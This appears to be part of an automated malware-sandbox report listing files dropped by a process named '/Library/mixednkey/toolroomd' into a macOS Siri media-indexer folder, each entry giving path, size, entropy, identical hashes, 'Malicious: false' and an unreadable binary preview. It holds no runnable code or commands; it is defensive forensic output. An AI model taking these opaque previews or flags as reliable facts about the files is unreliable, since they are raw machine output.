Preview:	...a>k...6...\..<...5y.[M.An..ym....x.R}.......gO[n.=i.YP...(.&..053..H..0].-.1.F.}Jo.....=i=..#. +......i&.j....>....H..M......O6zWV.#.U......d.>.A....~.q!.R.....-...C{..6./f..+....2.1c<.>..cwk)o./f..+.../f..+....I....v.A...~.r.O.-e....i&.j...E....}..Zo..a..L.z.F;......^7../..(.......$.^_2H......y>..Mn. b..yL.Y.z..U.h8x...n2.E....}.E....}.....S;./f..+....&.Pd.c]/f..+......w.L..q..p!...5.lNR..Q\|..vCIk...HpS..aCJ-]..S.^..(-..$....0\|R..... \..I..%...).4.. .\|.UA_fc4...{.{.rF.wC..~.'3o..a;E......nB..@..!..M....i..g.\.....L9..]..Q.3...2....i..C...w.Z............V.E(.>.%XCk.I..s...H....5..w.....Xd.:0.....r/.Q.../<.x.T...w..L......).I[..;..gU....<oY.h.....o.1. .T...w.%..U5.@S..52...&..k.....[y..h..n.......!X^..=k....+9i.s...'....w...g..9..=...=..Lf.A.n..'<.l...T...9v&....n...cbG..T`....Q.&ON.?.'.`.N.:m/.pe.i....Y.Tj.Z`.Z....l.B.."...q...1c..IG6.W.7.%8}i.8=..W.@.W...a.>n.....C..l,P=........e.3..3..8}.$..k..H.e.....5._'w..m.~."BV...2...)...

/Users/berri/Library/Containers/com.apple.siri.media-indexer/Data/.albumartistnamesdataTable.tdb.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	2362
Entropy (8bit):	3.8981862631708073
Encrypted:	false
SSDEEP:	12:M9phphphphphphphpj89GsewLYTc+qGm7:SLLLLLLLTsePc0m7
MD5:	63DA3DAB529CC9DE09E7882F5E74797C
SHA1:	EDF32A293C926A5E3FD892012E9C5BB666B89C95
SHA-256:	BE23FABA5B42FBBF0CBA86BD3C9E378A4914824F16A5B4B0E9D300B06E368142
SHA-512:	8E466F4F7E4D7250D12FEFB44F6B2B239C0E890B9D1470F8E7A7C20AE39C77139615342462BDDFA80BC66B407B55CC22EDD35624A62D3E8BDAA17731072BEB53
Malicious:	false
Preview:	.v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q.....e..)..v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q.....e..)..v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q.....e..)..v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q.....e..)..v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q...

/Users/berri/Library/Containers/com.apple.siri.media-indexer/Data/.albumartistnamesedgeTable.tdb.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	2362
Entropy (8bit):	3.8981862631708073
Encrypted:	false
SSDEEP:	12:M9phphphphphphphpj89GsewLYTc+qGm7:SLLLLLLLTsePc0m7
MD5:	63DA3DAB529CC9DE09E7882F5E74797C
SHA1:	EDF32A293C926A5E3FD892012E9C5BB666B89C95
SHA-256:	BE23FABA5B42FBBF0CBA86BD3C9E378A4914824F16A5B4B0E9D300B06E368142
SHA-512:	8E466F4F7E4D7250D12FEFB44F6B2B239C0E890B9D1470F8E7A7C20AE39C77139615342462BDDFA80BC66B407B55CC22EDD35624A62D3E8BDAA17731072BEB53
Malicious:	false
Preview:	.v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q.....e..)..v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q.....e..)..v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q.....e..)..v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q.....e..)..v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q...

/Users/berri/Library/Containers/com.apple.siri.media-indexer/Data/.albumartistnamesfinalTable.tdb.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	2362
Entropy (8bit):	3.8981862631708073
Encrypted:	false
SSDEEP:	12:M9phphphphphphphpj89GsewLYTc+qGm7:SLLLLLLLTsePc0m7
MD5:	63DA3DAB529CC9DE09E7882F5E74797C
SHA1:	EDF32A293C926A5E3FD892012E9C5BB666B89C95
SHA-256:	BE23FABA5B42FBBF0CBA86BD3C9E378A4914824F16A5B4B0E9D300B06E368142
SHA-512:	8E466F4F7E4D7250D12FEFB44F6B2B239C0E890B9D1470F8E7A7C20AE39C77139615342462BDDFA80BC66B407B55CC22EDD35624A62D3E8BDAA17731072BEB53
Malicious:	false
Preview:	.v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q.....e..)..v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q.....e..)..v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q.....e..)..v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q.....e..)..v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q...

/Users/berri/Library/Containers/com.apple.siri.media-indexer/Data/.albumtitlesdataTable.tdb.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	2362
Entropy (8bit):	3.8981862631708073
Encrypted:	false
SSDEEP:	12:M9phphphphphphphpj89GsewLYTc+qGm7:SLLLLLLLTsePc0m7
MD5:	63DA3DAB529CC9DE09E7882F5E74797C
SHA1:	EDF32A293C926A5E3FD892012E9C5BB666B89C95
SHA-256:	BE23FABA5B42FBBF0CBA86BD3C9E378A4914824F16A5B4B0E9D300B06E368142
SHA-512:	8E466F4F7E4D7250D12FEFB44F6B2B239C0E890B9D1470F8E7A7C20AE39C77139615342462BDDFA80BC66B407B55CC22EDD35624A62D3E8BDAA17731072BEB53
Malicious:	false
Preview:	.v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q.....e..)..v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q.....e..)..v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q.....e..)..v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q.....e..)..v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q...

/Users/berri/Library/Containers/com.apple.siri.media-indexer/Data/.albumtitlesedgeTable.tdb.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	2362
Entropy (8bit):	3.8981862631708073
Encrypted:	false
SSDEEP:	12:M9phphphphphphphpj89GsewLYTc+qGm7:SLLLLLLLTsePc0m7
MD5:	63DA3DAB529CC9DE09E7882F5E74797C
SHA1:	EDF32A293C926A5E3FD892012E9C5BB666B89C95
SHA-256:	BE23FABA5B42FBBF0CBA86BD3C9E378A4914824F16A5B4B0E9D300B06E368142
SHA-512:	8E466F4F7E4D7250D12FEFB44F6B2B239C0E890B9D1470F8E7A7C20AE39C77139615342462BDDFA80BC66B407B55CC22EDD35624A62D3E8BDAA17731072BEB53
Malicious:	false
Preview:	.v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q.....e..)..v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q.....e..)..v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q.....e..)..v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q.....e..)..v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q...

/Users/berri/Library/Containers/com.apple.siri.media-indexer/Data/.albumtitlesfinalTable.tdb.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	2362
Entropy (8bit):	3.8981862631708073
Encrypted:	false
SSDEEP:	12:M9phphphphphphphpj89GsewLYTc+qGm7:SLLLLLLLTsePc0m7
MD5:	63DA3DAB529CC9DE09E7882F5E74797C
SHA1:	EDF32A293C926A5E3FD892012E9C5BB666B89C95
SHA-256:	BE23FABA5B42FBBF0CBA86BD3C9E378A4914824F16A5B4B0E9D300B06E368142
SHA-512:	8E466F4F7E4D7250D12FEFB44F6B2B239C0E890B9D1470F8E7A7C20AE39C77139615342462BDDFA80BC66B407B55CC22EDD35624A62D3E8BDAA17731072BEB53
Malicious:	false
Preview:	.v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q.....e..)..v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q.....e..)..v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q.....e..)..v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q.....e..)..v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q...

/Users/berri/Library/Containers/com.apple.siri.media-indexer/Data/.artistnamesdataTable.tdb.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	2362
Entropy (8bit):	3.8981862631708073
Encrypted:	false
SSDEEP:	12:M9phphphphphphphpj89GsewLYTc+qGm7:SLLLLLLLTsePc0m7
MD5:	63DA3DAB529CC9DE09E7882F5E74797C
SHA1:	EDF32A293C926A5E3FD892012E9C5BB666B89C95
SHA-256:	BE23FABA5B42FBBF0CBA86BD3C9E378A4914824F16A5B4B0E9D300B06E368142
SHA-512:	8E466F4F7E4D7250D12FEFB44F6B2B239C0E890B9D1470F8E7A7C20AE39C77139615342462BDDFA80BC66B407B55CC22EDD35624A62D3E8BDAA17731072BEB53
Malicious:	false
Preview:	.v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q.....e..)..v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q.....e..)..v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q.....e..)..v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q.....e..)..v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q...

/Users/berri/Library/Containers/com.apple.siri.media-indexer/Data/.artistnamesedgeTable.tdb.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	2362
Entropy (8bit):	3.8981862631708073
Encrypted:	false
SSDEEP:	12:M9phphphphphphphpj89GsewLYTc+qGm7:SLLLLLLLTsePc0m7
MD5:	63DA3DAB529CC9DE09E7882F5E74797C
SHA1:	EDF32A293C926A5E3FD892012E9C5BB666B89C95
SHA-256:	BE23FABA5B42FBBF0CBA86BD3C9E378A4914824F16A5B4B0E9D300B06E368142
SHA-512:	8E466F4F7E4D7250D12FEFB44F6B2B239C0E890B9D1470F8E7A7C20AE39C77139615342462BDDFA80BC66B407B55CC22EDD35624A62D3E8BDAA17731072BEB53
Malicious:	false
Preview:	.v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q.....e..)..v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q.....e..)..v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q.....e..)..v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q.....e..)..v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q...

/Users/berri/Library/Containers/com.apple.siri.media-indexer/Data/.artistnamesfinalTable.tdb.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	2362
Entropy (8bit):	3.8981862631708073
Encrypted:	false
SSDEEP:	12:M9phphphphphphphpj89GsewLYTc+qGm7:SLLLLLLLTsePc0m7
MD5:	63DA3DAB529CC9DE09E7882F5E74797C
SHA1:	EDF32A293C926A5E3FD892012E9C5BB666B89C95
SHA-256:	BE23FABA5B42FBBF0CBA86BD3C9E378A4914824F16A5B4B0E9D300B06E368142
SHA-512:	8E466F4F7E4D7250D12FEFB44F6B2B239C0E890B9D1470F8E7A7C20AE39C77139615342462BDDFA80BC66B407B55CC22EDD35624A62D3E8BDAA17731072BEB53
Malicious:	false
Preview:	.v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q.....e..)..v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q.....e..)..v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q.....e..)..v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q.....e..)..v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q...

/Users/berri/Library/Containers/com.apple.siri.media-indexer/Data/.composernamesdataTable.tdb.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	2362
Entropy (8bit):	3.8981862631708073
Encrypted:	false
SSDEEP:	12:M9phphphphphphphpj89GsewLYTc+qGm7:SLLLLLLLTsePc0m7
MD5:	63DA3DAB529CC9DE09E7882F5E74797C
SHA1:	EDF32A293C926A5E3FD892012E9C5BB666B89C95
SHA-256:	BE23FABA5B42FBBF0CBA86BD3C9E378A4914824F16A5B4B0E9D300B06E368142
SHA-512:	8E466F4F7E4D7250D12FEFB44F6B2B239C0E890B9D1470F8E7A7C20AE39C77139615342462BDDFA80BC66B407B55CC22EDD35624A62D3E8BDAA17731072BEB53
Malicious:	false
Preview:	.v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q.....e..)..v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q.....e..)..v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q.....e..)..v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q.....e..)..v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q...

/Users/berri/Library/Containers/com.apple.siri.media-indexer/Data/.composernamesedgeTable.tdb.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	2362
Entropy (8bit):	3.8981862631708073
Encrypted:	false
SSDEEP:	12:M9phphphphphphphpj89GsewLYTc+qGm7:SLLLLLLLTsePc0m7
MD5:	63DA3DAB529CC9DE09E7882F5E74797C
SHA1:	EDF32A293C926A5E3FD892012E9C5BB666B89C95
SHA-256:	BE23FABA5B42FBBF0CBA86BD3C9E378A4914824F16A5B4B0E9D300B06E368142
SHA-512:	8E466F4F7E4D7250D12FEFB44F6B2B239C0E890B9D1470F8E7A7C20AE39C77139615342462BDDFA80BC66B407B55CC22EDD35624A62D3E8BDAA17731072BEB53
Malicious:	false
Preview:	.v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q.....e..)..v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q.....e..)..v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q.....e..)..v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q.....e..)..v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q...

/Users/berri/Library/Containers/com.apple.siri.media-indexer/Data/.composernamesfinalTable.tdb.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	2362
Entropy (8bit):	3.8981862631708073
Encrypted:	false
SSDEEP:	12:M9phphphphphphphpj89GsewLYTc+qGm7:SLLLLLLLTsePc0m7
MD5:	63DA3DAB529CC9DE09E7882F5E74797C
SHA1:	EDF32A293C926A5E3FD892012E9C5BB666B89C95
SHA-256:	BE23FABA5B42FBBF0CBA86BD3C9E378A4914824F16A5B4B0E9D300B06E368142
SHA-512:	8E466F4F7E4D7250D12FEFB44F6B2B239C0E890B9D1470F8E7A7C20AE39C77139615342462BDDFA80BC66B407B55CC22EDD35624A62D3E8BDAA17731072BEB53
Malicious:	false
Preview:	.v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q.....e..)..v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q.....e..)..v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q.....e..)..v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q.....e..)..v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q...

/Users/berri/Library/Containers/com.apple.siri.media-indexer/Data/.genrenamesdataTable.tdb.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	2362
Entropy (8bit):	3.8981862631708073
Encrypted:	false
SSDEEP:	12:M9phphphphphphphpj89GsewLYTc+qGm7:SLLLLLLLTsePc0m7
MD5:	63DA3DAB529CC9DE09E7882F5E74797C
SHA1:	EDF32A293C926A5E3FD892012E9C5BB666B89C95
SHA-256:	BE23FABA5B42FBBF0CBA86BD3C9E378A4914824F16A5B4B0E9D300B06E368142
SHA-512:	8E466F4F7E4D7250D12FEFB44F6B2B239C0E890B9D1470F8E7A7C20AE39C77139615342462BDDFA80BC66B407B55CC22EDD35624A62D3E8BDAA17731072BEB53
Malicious:	false
Preview:	.v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q.....e..)..v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q.....e..)..v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q.....e..)..v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q.....e..)..v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q...

/Users/berri/Library/Containers/com.apple.siri.media-indexer/Data/.genrenamesedgeTable.tdb.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	2362
Entropy (8bit):	3.8981862631708073
Encrypted:	false
SSDEEP:	12:M9phphphphphphphpj89GsewLYTc+qGm7:SLLLLLLLTsePc0m7
MD5:	63DA3DAB529CC9DE09E7882F5E74797C
SHA1:	EDF32A293C926A5E3FD892012E9C5BB666B89C95
SHA-256:	BE23FABA5B42FBBF0CBA86BD3C9E378A4914824F16A5B4B0E9D300B06E368142
SHA-512:	8E466F4F7E4D7250D12FEFB44F6B2B239C0E890B9D1470F8E7A7C20AE39C77139615342462BDDFA80BC66B407B55CC22EDD35624A62D3E8BDAA17731072BEB53
Malicious:	false
Preview:	.v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q.....e..)..v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q.....e..)..v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q.....e..)..v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q.....e..)..v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q...

/Users/berri/Library/Containers/com.apple.siri.media-indexer/Data/.genrenamesfinalTable.tdb.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	2362
Entropy (8bit):	3.8981862631708073
Encrypted:	false
SSDEEP:	12:M9phphphphphphphpj89GsewLYTc+qGm7:SLLLLLLLTsePc0m7
MD5:	63DA3DAB529CC9DE09E7882F5E74797C
SHA1:	EDF32A293C926A5E3FD892012E9C5BB666B89C95
SHA-256:	BE23FABA5B42FBBF0CBA86BD3C9E378A4914824F16A5B4B0E9D300B06E368142
SHA-512:	8E466F4F7E4D7250D12FEFB44F6B2B239C0E890B9D1470F8E7A7C20AE39C77139615342462BDDFA80BC66B407B55CC22EDD35624A62D3E8BDAA17731072BEB53
Malicious:	false
Preview:	.v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q.....e..)..v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q.....e..)..v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q.....e..)..v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q.....e..)..v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q....v.q...

/Users/berri/Library/Containers/com.apple.siri.media-indexer/Data/.mediatitlesdataTable.tdb.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	2362
Entropy (8bit):	3.8981862631708073
Encrypted:	false
SSDEEP:	12:M9phphphphphphphpj89GsewLYTc+qGm7:SLLLLLLLTsePc0m7
MD5:	63DA3DAB529CC9DE09E7882F5E74797C
SHA1:	EDF32A293C926A5E3FD892012E9C5BB666B89C95
SHA-256:	BE23FABA5B42FBBF0CBA86BD3C9E378A4914824F16A5B4B0E9D300B06E368142
SHA-512:	8E466F4F7E4D7250D12FEFB44F6B2B239C0E890B9D1470F8E7A7C20AE39C77139615342462BDDFA80BC66B407B55CC22EDD35624A62D3E8BDAA17731072BEB53
Malicious:	false
